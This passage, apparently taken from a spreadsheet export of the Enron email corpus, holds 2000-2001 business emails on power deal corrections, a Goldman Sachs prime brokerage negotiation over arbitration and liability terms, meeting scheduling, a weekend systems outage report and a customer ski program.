PS - Be sure to pass this on to interested friends or associates._x000D_
_x000D_
_x000D_
--------------------------------------------_x000D_
To unsubscribe from this list, reply to this message with "remove" in the subject line.</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 04:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Deal #582470</t>
  </si>
  <si>
    <t>This deal has no price entered -should we not confirm it?  or is it wrong?_x000D_
Thanks!_x000D_
Kim</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 08:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Kay, can you set up a one hour to half an hour with each if possible._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 09/06/2000 _x000D_
03:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Shawn Cumberland@ENRON_DEVELOPMENT_x000D_
09/06/2000 02:02 AM_x000D_
To: David W Delainey@ECT, Kay Chapman@ECT_x000D_
cc:  _x000D_
Subject: Contacts_x000D_
_x000D_
Kay,_x000D_
_x000D_
Dave asked me to send you a note to set up meetings for him with two of our _x000D_
executives:  Mariella Mahan and Dan Castagnola._x000D_
_x000D_
It sounded like he was thinking about Friday._x000D_
_x000D_
Shawn_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 10:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jcoiley@wfw.com'})</t>
  </si>
  <si>
    <t>ISDA Agreement between Credit Agricole Indosuez and Enron North_x000D_
 America Corp.</t>
  </si>
  <si>
    <t>James:  Please ignore my earlier email.  I do have your email of 6/13/00 and _x000D_
will respond as quickly as possible.  Thanks.  Sara_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 07/05/2000 05:31 PM -----_x000D_
_x000D_
	Sara Shackleton_x000D_
	07/05/2000 03:40 PM_x000D_
		 _x000D_
		 To: jcoiley@wfw.com_x000D_
		 cc: _x000D_
		 Subject: ISDA Agreement between Credit Agricole Indosuez and Enron North _x000D_
America Corp._x000D_
_x000D_
James:  I just thought I'd follow up with you regarding our conversation of _x000D_
June 7, 2000.  I thought that you were going to produce a new draft based _x000D_
upon our discussion.  Please let me know if I misunderstood or if in fact the _x000D_
ball is in my court.  Thanks.  Sara</t>
  </si>
  <si>
    <t>Re: Advertising.</t>
  </si>
  <si>
    <t xml:space="preserve">I don't see any immediate problem.  As long as the advertising didn't _x000D_
interfere with the effectiveness and efficiency of Hot Tap as a tool for _x000D_
satisfying our posting and notice obligations, FERC shouldn't care.  The _x000D_
revenue would be nonjurisdictional and would be treated as such in Northern's _x000D_
or TW's next rate case.  As to the "type of advertising," I can't think of a _x000D_
legal or regulatory reason we need to be picky, but we may want to exclude _x000D_
certain types of services that seem to rely heavily on internet advertising _x000D_
if you know what I mean.  DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Steve Hotte_x000D_
10/18/2000 01:06 PM_x000D_
To: Shelley Corman/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Danny McCarty/ET&amp;S/Enron@Enron, Stanley Horton/Corp/Enron@Enron, Julia _x000D_
White/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Advertising._x000D_
_x000D_
Shelly/Drew,_x000D_
_x000D_
We  get quite a bit of customer activity on our Hot Tap internet site.  Do _x000D_
you think there would be any legal or regulatory restriction on us offering _x000D_
advertising on that site.  We can be selective on the type of advertising, _x000D_
but would obviously want to choose a vendor that would benefit from exposure _x000D_
to the Hot Tap audience. _x000D_
_x000D_
The revenue from such an idea varies.  If it passes the legal and regulatory _x000D_
test I will look into potential customers and firm up some figures._x000D_
_x000D_
Thanks,_x000D_
Steve_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 03:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Everything looks good.  Thank you!!_x000D_
ajc_x000D_
_x000D_
_x000D_
   Kate Symes                04/10/2001 12:30 PM_x000D_
_x000D_
To: Chris H Foster/HOU/ECT@ECT, Audrey Cook/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)  _x000D_
_x000D_
The following deal has been changed once more. Here are the details:_x000D_
_x000D_
576468_x000D_
West Services buys from APX_x000D_
NP-15_x000D_
Off Peak - 1.8 MW @ $140_x000D_
     10.2 MW @ $150_x000D_
TOTAL MWH = 96_x000D_
_x000D_
(572069 stays 12 MW @ $150)_x000D_
_x000D_
Please call me with questions. _x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
503-464-7486 or 3823_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris H Foster                           04/10/2001 07:52 AM_x000D_
	_x000D_
_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)_x000D_
_x000D_
Kate:_x000D_
_x000D_
Can you please modify that deal that you made the price $140 yesterday to _x000D_
make it for the 6th only?  The 7th is all at $150._x000D_
_x000D_
Thanks_x000D_
_x000D_
C_x000D_
---------------------- Forwarded by Chris H Foster/HOU/ECT on 04/10/2001 _x000D_
09:58 AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/10/2001 07:51 AM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Deal #576468.1 &amp; 572069.1 (4/6/2001 &amp; 4/7/2001)_x000D_
_x000D_
Chris,_x000D_
Good morning!  Hey, one thing I probably did not clarify to you yesterday on _x000D_
was that when the new deal ticket was set up for the $140 price strip (Deal _x000D_
#576468.1), the deal should only be in for (4/6/2001) according to APX's _x000D_
statement (not including 4/7/2001).  Therefore, the entire offpeak for your _x000D_
deal would be booked on Deal #572069.1 for the $150 price for 4/7/2001.  Let _x000D_
me know if you have any questions.  Thanks._x000D_
ajc_x000D_
_x000D_
---------------------- Forwarded by Audrey Cook/HOU/ECT on 04/10/2001 09:44 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Audrey Cook_x000D_
04/06/2001 01:27 PM_x000D_
To: Chris H Foster/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: APX - 4/6/2001_x000D_
_x000D_
Chris,_x000D_
One more quick thing on 4/6/2001- APX is showing 2 different prices for _x000D_
offpeak ($140 &amp; $150 - different MW per strip).  EPMI is showing $150 @ 12/MW _x000D_
per offpeak hours.  This difference amounts to a $144 difference (APX has _x000D_
lower invoice).  Can you verify?  Everything else is fine....talk to you next _x000D_
week.  Have a good weekend.  _x000D_
ajc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 04:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: List of Outside Counsel</t>
  </si>
  <si>
    <t xml:space="preserve">It will take me awhile to find it.  Please ask Linda Simmons._x000D_
_x000D_
_x000D_
From: Carlos Sole on 05/17/2001 11:15 AM_x000D_
To: kay.mann@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: List of Outside Counsel_x000D_
_x000D_
Would you forward me the outside counsel list again.  thanks_x000D_
_x000D_
Carlos Sole'_x000D_
Senior Counsel_x000D_
Enron North America Corp._x000D_
1400 Smith Street_x000D_
Houston, Texas 77002-7361_x000D_
_x000D_
(713) 345-8191 (phone)_x000D_
713 646-3393 (fax)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 01:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: 1/25/00 Meeting re TBA Documentation</t>
  </si>
  <si>
    <t>What time</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 07:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 5-25-01 through 5-29-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
May 25, 2001 5:00pm through May 29, 2001 12:00am_x000D_
------------------------------------------------------------------------------_x000D_
------------------------_x000D_
_x000D_
ECS to ECN Network Interconnection, June 9th 2001_x000D_
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nterconnection activities are scheduled to occur the evening of June 9th _x000D_
2001 starting from 7:00 p.m.(CT) and completing around 11:00 p.m. (CT). _x000D_
Application testing activities will begin at 11:00 p.m. (CT) once all network _x000D_
testing has completed._x000D_
_x000D_
If you have any further questions, please contact Pete Castrejana at _x000D_
713-410-0642 for more information.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SEE ORIGINAL REPORT_x000D_
 _x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING:    SEE ORIGINAL REPORT_x000D_
 _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS:   SEE ORIGINAL REPORT_x000D_
 _x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM:_x000D_
_x000D_
Impact:  CORP_x000D_
Time:  Fri 5/25/2001 at  5:00:00 PM thru Fri 5/25/2001 at  7:00:00 PM_x000D_
Outage:  Memory replacement for server refraction._x000D_
Disruption:  Total Disruption of Service_x000D_
Environments Impacted:  DPR and EnTelligence_x000D_
Purpose: To replace a memory module that has repeated error._x000D_
Backout: Leave server in current configuration._x000D_
Contact(s):  Malcolm Wells    _x000D_
      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Tue, 24 Oct 2000 11:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Information Release Message</t>
  </si>
  <si>
    <t xml:space="preserve">I vote for waiting until Monday to discuss.  This is one part of the larger _x000D_
PR / Government Affairs strategy in California.  We need Karen Denne (PR) to _x000D_
come to Portland for the meeting on Monday._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Tim Belden@ECT_x000D_
	10/24/2000 05:54 PM_x000D_
		 _x000D_
		 To: Mark Palmer/Corp/Enron@ENRON, James D Steffes/NA/Enron@Enron, Jeff _x000D_
Dasovich/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Information Release Message_x000D_
_x000D_
When do you guys want to talk through this?  Who should be involved?  Can it _x000D_
wait until Monday when we have our California meeting here in Portland?_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 09:30:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'talya.gordon@gs.com'})</t>
  </si>
  <si>
    <t>I am preparing the information on the Company Account Application and have a question regarding the address section.  I have completed the section regarding ECT Investment's "principal executive office" (Houston address) and would like to know how this differs, or if it differs, from the address of "registered office".  Would you explain the difference, if any?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Marie Heard_x000D_
Senior Legal Specialist_x000D_
Enron North America Corp._x000D_
Phone:  (713) 853-3907_x000D_
Fax:  (713) 646-3490_x000D_
marie.heard@enron.com_x000D_
  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Gordon, Talya" &lt;talya.gordon@gs.com&gt;@ENRON [mailto:IMCEANOTES-+22Gordon+2C+20Talya+22+20+3Ctalya+2Egordon+40gs+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, September 19, 2001 8:33 AM_x000D_
To:	Shackleton, Sara; "\"Harris@ENRON; Daniel\" &lt;Daniel.Harris@gs.com&gt;@ENRON" &lt;IMCEANOTES-+22Harris+2C+20Daniel+22+20+3CDaniel+2EHarris+40gs+2Ecom+3E+40ENRON@ENRON.com&gt;_x000D_
Cc:	kara.saxon@gs.com; Heard, Marie; talya.gordon@gs.com; Glover, Sheila_x000D_
Subject:	RE: ECT Investments, Inc. account with Goldman Sachs International_x000D_
_x000D_
Dear Sara_x000D_
_x000D_
I am responding to you whilst Daniel Harris is out of the office._x000D_
_x000D_
In reference to Arbitration, we can agree to Arbitration in the English_x000D_
Courts._x000D_
_x000D_
Daniel will contact you tomorrow in reference to the remaining points._x000D_
_x000D_
I look forward to receiving the outstanding documentation._x000D_
_x000D_
Kind regards_x000D_
Talya Gordon_x000D_
_x000D_
-----Original Message-----_x000D_
From: Shackleton, Sara [mailto:Sara.Shackleton@ENRON.com]_x000D_
Sent: 17 September 2001 23:51_x000D_
To: "Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
Cc: kara.saxon@gs.com; Heard, Marie; talya.gordon@gs.com; Glover, Sheila_x000D_
Subject: RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
International_x000D_
_x000D_
_x000D_
Daniel:_x000D_
_x000D_
Thank you for your response.  Unfortunately, the outstanding issues_x000D_
relating to the Terms of Business Letter impact our corporate policy._x000D_
If you insist upon arbitration, it should be at either party's option_x000D_
and we can agree to arbitrate in accordance with the International_x000D_
Chamber of Commerce Rules.  Also, as you mentioned below, there may be_x000D_
non-prime brokerage issues that relate to the terms of business and,_x000D_
therefore, are not adequately addressed in the terms of business letter._x000D_
We do have other business relationships with GSI and again request_x000D_
inclusion of limitation of liability language in the terms of business_x000D_
letter.  I propose:_x000D_
_x000D_
"Neither party shall have any liability arising from this Letter or from_x000D_
any obligations which relate to this Letter for any indirect, special,_x000D_
punitive, exemplary, incidental or consequential loss or damage."_x000D_
_x000D_
Please reconsider the foregoing with explanation.  I will be out of the_x000D_
office 9/18/01 in the a.m._x000D_
_x000D_
All remaining documents have been completed and we will have them_x000D_
executed together with the terms of business letter._x000D_
_x000D_
Regards.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	"Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
&gt; [mailto:IMCEANOTES-+22Harris+2C+20Daniel+22+20+3CDaniel+2EHarris+40gs+_x000D_
&gt; 2Ecom+3E+40ENRON@ENRON.com]_x000D_
&gt; Sent:	Tuesday, September 11, 2001 3:15 AM_x000D_
&gt; To:	Shackleton, Sara_x000D_
&gt; Subject:	RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt; Sara_x000D_
&gt;_x000D_
&gt; The terms of business are GSI's general terms and span your_x000D_
&gt; relationship_x000D_
&gt; with GSI generally. There may be non-prime brokerage issues that_x000D_
&gt; relate to_x000D_
&gt; the terms of business. Not everything in the TOBs intersects with the_x000D_
&gt; PB_x000D_
&gt; relationship, certainly if you do other business with GSI._x000D_
&gt;_x000D_
&gt; Re the liability provision, I think your concerns are adequately_x000D_
&gt; addressed_x000D_
&gt; in the documentation as drafted._x000D_
&gt;_x000D_
&gt; I would be grateful if you would come back to me as soon as possible_x000D_
&gt; so we_x000D_
&gt; can try to get this wrapped up today._x000D_
&gt;_x000D_
&gt; Kind regards_x000D_
&gt;_x000D_
&gt; Daniel_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
&gt; Sent: 10 September 2001 21:02_x000D_
&gt; To: Daniel.Harris@gs.com_x000D_
&gt; Subject: RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Daniel:_x000D_
&gt;_x000D_
&gt; Thanks for the message.  It seems to me that the terms of the PB_x000D_
&gt; conflict_x000D_
&gt; because J14 conflicts with A3, that is, (i)  J14 conflicts with Par.8_x000D_
&gt; requiring the conclusion that English courts will not apply to the_x000D_
&gt; Terms of_x000D_
&gt; Business agreement and (ii) A3 requires that English courts prevail._x000D_
&gt; Are_x000D_
&gt; you agreeing with this analysis?_x000D_
&gt;_x000D_
&gt; Also, there is nothing in the Terms of Business agreement to conflict_x000D_
&gt; with_x000D_
&gt; the limitation of liability language of the PB applicable to the PB_x000D_
&gt; (except_x000D_
&gt; for silence on the matter).  You didn't address this point.  It is_x000D_
&gt; Enron_x000D_
&gt; Corp. policy to include such language and I would like to limit the_x000D_
&gt; Terms_x000D_
&gt; of Business in the same manner._x000D_
&gt;_x000D_
&gt; Can you call me at 9 am Houston time on Tuesday, Sept. 11?  or suggest_x000D_
&gt; a_x000D_
&gt; different time?  I am not trying to belabor execution of the the_x000D_
&gt; remaining_x000D_
&gt; documents._x000D_
&gt;_x000D_
&gt; Thanks._x000D_
&gt;_x000D_
&gt; Sara Shackleton_x000D_
&gt; Enron Wholesale Services_x000D_
&gt; 1400 Smith Street, EB3801a_x000D_
&gt; Houston, TX  77002_x000D_
&gt; Ph:  (713) 853-5620_x000D_
&gt; Fax: (713) 646-3490_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
&gt;_x000D_
&gt; [mailto:IMCEANOTES-+22Harris+2C+20Daniel+22+20+3CDaniel+2EHarris+40gs+_x000D_
&gt; 2Ecom+_x000D_
&gt; 3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Monday, September 10, 2001 1:23 AM_x000D_
&gt;    To:     Shackleton, Sara_x000D_
&gt;    Cc:     Daniella.Bodman-Morris@gs.com; Heard, Marie_x000D_
&gt;    Subject:  RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt;              International_x000D_
&gt;_x000D_
&gt;    Sara_x000D_
&gt;    Actually, I believe we resolved these when we spoke. Arbitration -_x000D_
&gt; more_x000D_
&gt;    appropriate to general terms of business which principally_x000D_
&gt; contemplate_x000D_
&gt;    the_x000D_
&gt;    regulatory rules to which we are subject (SFA rules). In the event_x000D_
&gt; of_x000D_
&gt;    inconsistency, the terms of the PB agreement govern (clause A3)._x000D_
&gt;_x000D_
&gt;    I also amended the OSLA by side letter, which I sent over._x000D_
&gt;_x000D_
&gt;    Kind regards_x000D_
&gt;_x000D_
&gt;    Daniel_x000D_
&gt;_x000D_
&gt;    -----Original Message-----_x000D_
&gt;    From: Shackleton, Sara [mailto:Sara.Shackleton@ENRON.com]_x000D_
&gt;    Sent: 07 September 2001 20:45_x000D_
&gt;    To: Daniel.Harris@gs.com_x000D_
&gt;    Cc: Daniella.Bodman-Morris@gs.com; Heard, Marie_x000D_
&gt;    Subject: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Daniel:_x000D_
&gt;_x000D_
&gt;    Thanks for finalizing the Prime Brokerage Agreement (the_x000D_
&gt; "Agreement")_x000D_
&gt;    with my colleague Angela Davis._x000D_
&gt;_x000D_
&gt;    I have two points with respect to the Terms of Business Letter_x000D_
&gt; relating_x000D_
&gt;    to the changes made to the Agreement which I believe we discussed_x000D_
&gt; but_x000D_
&gt;    were not in a position to resolve at the time.  These are:_x000D_
&gt;_x000D_
&gt;    (1)  Par. 8 Arbitration (which should conform to Clause J, Par. 14_x000D_
&gt; of_x000D_
&gt;    the Agreement).  I recall that we were discussing the possible use_x000D_
&gt; of_x000D_
&gt;    arbitration in the Agreement (and existence of arbitration in the_x000D_
&gt; OSLA)_x000D_
&gt;    so that we would not need to amend this particular paragraph of the_x000D_
&gt;    Terms of Business Letter.  Since we ultimately agreed to English_x000D_
&gt; courts,_x000D_
&gt;    I think we need to conform the Terms of Business Letter which will_x000D_
&gt;    prevail if in conflict with the Agreement._x000D_
&gt;_x000D_
&gt;    (2)  Par. 8 Arbitration (which should be limited in the same manner_x000D_
&gt; as_x000D_
&gt;    Clause J, Par. 11 as to limitation of liability).  I believe that_x000D_
&gt; you_x000D_
&gt;    and Angela agreed to the revisions in the Agreement.  Why shouldn't_x000D_
&gt;    these be mirrored in the Terms of Business Letter?_x000D_
&gt;_x000D_
&gt;    I look forward to hearing from you and completing the rest of the_x000D_
&gt;    account documentation.  Regards._x000D_
&gt;_x000D_
&gt;    Sara Shackleton_x000D_
&gt;    Enron Wholesale Services_x000D_
&gt;    1400 Smith Street, EB3801a_x000D_
&gt;    Houston, TX  77002_x000D_
&gt;    Ph:  (713) 853-5620_x000D_
&gt;    Fax: (713) 646-3490_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt;    This e-mail is the property of Enron Corp. and/or its relevant_x000D_
&gt; affiliate_x000D_
&gt;    and_x000D_
&gt;    may contain confidential and privileged material for the sole use_x000D_
&gt; of the_x000D_
&gt;    intended recipient (s). Any review, use, distribution or disclosure_x000D_
&gt; by_x000D_
&gt;    others is strictly prohibited. If you are not the intended_x000D_
&gt; recipient (or_x000D_
&gt;    authorized to receive for the recipient), please contact the sender_x000D_
&gt; or_x000D_
&gt;    reply_x000D_
&gt;    to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete_x000D_
&gt;    all_x000D_
&gt;    copies of the message. This e-mail (and any attachments hereto) are_x000D_
&gt; not_x000D_
&gt;    intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence_x000D_
&gt;    a_x000D_
&gt;    binding and enforceable contract between Enron Corp. (or any of its_x000D_
&gt;    affiliates) and the intended recipient or any other party, and may_x000D_
&gt; not_x000D_
&gt;    be_x000D_
&gt;    relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise._x000D_
&gt;    Thank you._x000D_
&gt;_x000D_
&gt; **********************************************************************</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'david_teece@lecg.com'})</t>
  </si>
  <si>
    <t>Re: california</t>
  </si>
  <si>
    <t xml:space="preserve">Great.  Glad to hear it.  Did you get my voice mail?  Makes sense for you to _x000D_
go ahead and start cobbling together a formal proposal.  I've talked to folks _x000D_
internally (and will discuss further with them tomorrow and Friday when I'm _x000D_
in Houston).  I'd like you to keep the information confidential, but I'm _x000D_
fairly confident that we're already at the point where it's not a matter of _x000D_
whether but of what the terms and conditions of the contract and the scope of _x000D_
the project will be._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David_Teece@LECG.com on 08/16/2000 12:31:57 PM_x000D_
To: jdasovic@enron.com_x000D_
cc:  _x000D_
Subject: Re: california_x000D_
_x000D_
_x000D_
_x000D_
All's well.  Great enthusiasm from everyone I have contacted so far. We can_x000D_
undoubtedly pull this off.  Look forward to hearing from you._x000D_
_x000D_
-- David_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
jdasovic@enron.com on 08/14/2000 01:33:16 PM_x000D_
_x000D_
To:   David_Teece@LECG.com_x000D_
cc:_x000D_
_x000D_
Subject:  Re: california_x000D_
_x000D_
_x000D_
_x000D_
Hi David:_x000D_
_x000D_
Thanks again for meeting last week.  Just wanted to let you know that I'll_x000D_
be meeting in Houston on Thursday to discuss the project we discussed._x000D_
Hope all is going well thus far on your end._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 07:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'skramer@milbank.com'})</t>
  </si>
  <si>
    <t>Re: Energy Bar Association Program</t>
  </si>
  <si>
    <t xml:space="preserve">Steve:_x000D_
_x000D_
It looks like a great program!  I am happy to participate.  I would like to _x000D_
have a teleconference of the panel within a few weeks so that I can make sure _x000D_
I have time to get my materials together. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Mark_x000D_
_x000D_
_x000D_
_x000D_
	SKramer@milbank.com_x000D_
	09/20/2000 04:14 PM_x000D_
		 _x000D_
		 To: mark.e.haedicke@enron.com_x000D_
		 cc: _x000D_
		 Subject: Energy Bar Association Program_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark, _x000D_
_x000D_
Per my telephone conversation with Margaret Gerhardt, I want to thank you _x000D_
very much for your interest in participating on the e-commerce panel for the _x000D_
Energy Bar Association mid-year program.? Margaret suggested that you be _x000D_
listed on the program brochure as "invited," in case a conflict should arise. _x000D_
The Association will be distributing a final brochure at a later date which _x000D_
will reflect any changes in speakers.? Attached for your information is a _x000D_
draft program brochure and a brief overview of the? e-commerce panel.? The _x000D_
Association believes that the e-commerce panel is timely given the dramatic _x000D_
impact that electronic commerce is having on the economy generally, and in _x000D_
particular due to the unprecedented changes taking place in the energy _x000D_
industries.? Having the perspective of EnronOnline, the industry leader, will _x000D_
be a great addition to the program. _x000D_
_x000D_
Please let me know if you have questions or need additional information.? I _x000D_
look forward to seeing you at the program. _x000D_
_x000D_
Steve _x000D_
_x000D_
Steven M. Kramer _x000D_
Milbank, Tweed, Hadley &amp; McCloy LLP _x000D_
International Square Building _x000D_
1825 Eye Street, N.W. _x000D_
Washington, D.C. 20006 _x000D_
TEL:? 202-835-7508 _x000D_
FAX:? 202-835-7586 _x000D_
skramer@milbank.com _x000D_
_x000D_
 &lt;&lt;EBA-MidYear2000-Agenda-Draft-9-12-00.doc&gt;&gt;  &lt;&lt;EBA Mid-Year Meeting.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EBA-MidYear2000-Agenda-Draft-9-12-00.doc_x000D_
 - EBA Mid-Year Meeting.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 03:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2001 ENA/EGM/EIM CUSTOMER SKI PROGRAM</t>
  </si>
  <si>
    <t xml:space="preserve">Dorie, I have to question the effectiveness of this program.  Over the years, _x000D_
it appears that more spots are being filled by Enron people then customers. _x000D_
The effectiveness of this forum from a customer point of view is _x000D_
questionable.  I vote to kill it._x000D_
_x000D_
Please forgive the approach - but I would like to provoke a discussion with _x000D_
my partners._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 11/30/2000 _x000D_
11:20 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Dorie Hitchcock                           11/30/2000 06:40 AM_x000D_
	_x000D_
_x000D_
To: Sylvia S Pollan/HOU/ECT@ECT, Robyn Zivic/NA/Enron@Enron, Andrew H _x000D_
Lewis/HOU/ECT@ECT, Geoff Storey/HOU/ECT@ECT, Martin Cuilla/HOU/ECT@ECT, _x000D_
Patrice L Mims/HOU/ECT@ECT, Kevin Ruscitti/HOU/ECT@ECT, Kelli _x000D_
Stevens/HOU/ECT@ECT, Tom Donohoe/HOU/ECT@ECT, Joe Parks/Corp/Enron@ENRON, _x000D_
Janet H Wallis/HOU/ECT@ECT, Gary Bryan/HOU/ECT@ECT, Jill T _x000D_
Zivley/HOU/ECT@ECT, Brian Bierbach/NA/Enron@Enron, John Craig _x000D_
Taylor/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, Daniel Reck/HOU/ECT@ECT, _x000D_
George McClellan/HOU/ECT@ECT, Mark Tawney/HOU/ECT@ECT, Jere C _x000D_
Overdyke/HOU/ECT@ECT, Larry Lawyer/NA/Enron@Enron, Brent A Price/HOU/ECT@ECT, _x000D_
Eric Gonzales/LON/ECT@ECT, Cindy Skinner/HOU/ECT@ECT, John L _x000D_
Nowlan/HOU/ECT@ECT, Don Schroeder/HOU/ECT@ECT, Doug Leach/HOU/ECT@ECT, Bryan _x000D_
Burnett/HOU/ECT@ECT, Wendy King/Corp/Enron@ENRON, Tim Battaglia@Enron, _x000D_
Douglas B Dunn/HOU/ECT@ECT, Rodney Malcolm/HOU/ECT@ECT, Billy _x000D_
Lemmons/Corp/Enron@ENRON, David Howe/Corp/Enron@ENRON, Mark _x000D_
Frevert/NA/Enron@Enron, John J Lavorato/Corp/Enron@Enron, David W _x000D_
Delainey/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Jeffrey McMahon/HOU/ECT@ECT, Raymond Bowen/HOU/ECT@ECT, _x000D_
Jeffery Ader/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT, John _x000D_
Arnold/HOU/ECT@ECT, Edward D Baughman/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, _x000D_
Tim Belden/HOU/ECT@ECT, Christopher F Calger/PDX/ECT@ECT, Wes _x000D_
Colwell/HOU/ECT@ECT, Derek Davies/CAL/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, _x000D_
Joseph Deffner/HOU/ECT@ECT, Paul Devries/TOR/ECT@ECT, Janet R _x000D_
Dietrich/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Stephen H _x000D_
Douglas/HOU/ECT@ECT, W David Duran/HOU/ECT@ECT, Chris H Foster/HOU/ECT@ECT, _x000D_
Mark E Haedicke/HOU/ECT@ECT, Rogers Herndon/HOU/ECT@ect, Scott _x000D_
Josey/Corp/Enron@ENRON, C John Thompson/Corp/Enron@ENRON, Fred _x000D_
Lagrasta/HOU/ECT@ECT, Eric LeDain/CAL/ECT@ECT, Laura Luce/Corp/Enron@Enron, _x000D_
Thomas A Martin/HOU/ECT@ECT, Jonathan McKay/CAL/ECT@ECT, Michael L _x000D_
Miller/NA/Enron@Enron, Rob Milnthorp/CAL/ECT@ECT, Jean Mrha/NA/Enron@Enron, _x000D_
Scott Neal/HOU/ECT@ECT, David Oxley/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, _x000D_
